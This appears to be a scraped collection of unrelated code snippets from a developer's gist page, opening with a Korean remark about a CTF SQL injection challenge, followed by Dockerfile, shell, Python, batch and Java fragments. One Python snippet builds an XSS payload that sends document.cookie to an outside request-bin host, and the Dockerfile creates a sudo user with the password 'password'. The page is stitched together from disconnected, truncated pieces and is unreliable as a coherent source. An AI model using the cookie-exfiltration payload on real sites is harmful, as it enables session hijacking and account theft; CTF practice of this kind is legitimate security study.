직장인에게 소중한 주말이지만 보기 힘든 클래식한 sql injection문제가 나왔다는 소식에 시간을 내보았습니다.
Welcome to Hacker's Libreria!
9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08 |
# Dockerfile | |
FROM ubuntu:latest | |
RUN apt-get update | |
RUN apt-get install -y vim sudo man-db gcc lrzsz openssh-server | |
RUN yes | unminimize | |
RUN useradd -ms /bin/bash guest | |
RUN echo 'guest:password' | chpasswd | |
RUN usermod -a -G sudo guest |
#!/bin/bash | |
DEBIAN_FRONTEND=noninteractive | |
ln -sf /usr/share/zoneinfo/Asia/Seoul /etc/localtime | |
# USER CUSTOMIZE SESSION | |
export USER_NAME= | |
export PASS='' # len >= 9, don't use well known like qwe123!@# | |
export SSH_EMAIL='' | |
export SSH_PASS='' | |
export PY_VER='3.12.0' |
import requests | |
HOST = "https://9307-211-114-95-154.ngrok-free.app" | |
HOST = "http://58.225.56.195" | |
req_bin = "https://jsngigx.request.dreamhack.games" | |
ex_src = f"location.replace('{req_bin}/?a='+document.cookie);" | |
idx = int(input("마지막 글의 idx를 알려주세요")) |
import requests | |
from bs4 import BeautifulSoup | |
URI = "http://libreriapro37657fd3.sstf.site" | |
params = { | |
"key": 2016, | |
"search_with": "year", | |
"currency":"krw" | |
} |
import time | |
# ToDo | |
todo = ''' | |
- todo1 | |
- todo2 | |
''' | |
def parse() -> list: | |
return [s[1:-1] for i, s in enumerate(todo.split("-")[1:])] |
@echo off | |
:: Initial message | |
echo ==================================================== | |
echo All Praises be to God , who have Created All Things, | |
echo While He Himself is Uncreated | |
echo ==================================================== | |
echo Latest ADB Fastboot and USB Driver Installer tool | |
echo By fawazahmed0 @ xda-developers | |
echo ==================================================== |
// private static KThread joinedThread = null; | |
/* | |
┌────┐ | |
│join│ | |
└─┬──┘ | |
│ | |
▼ | |
┌────────────────┐ ┌───────┐ | |
│ already called ├──► │ error │ | |
└────────┬───────┘ └───────┘ |
I hereby claim:
To claim this, I am signing this object: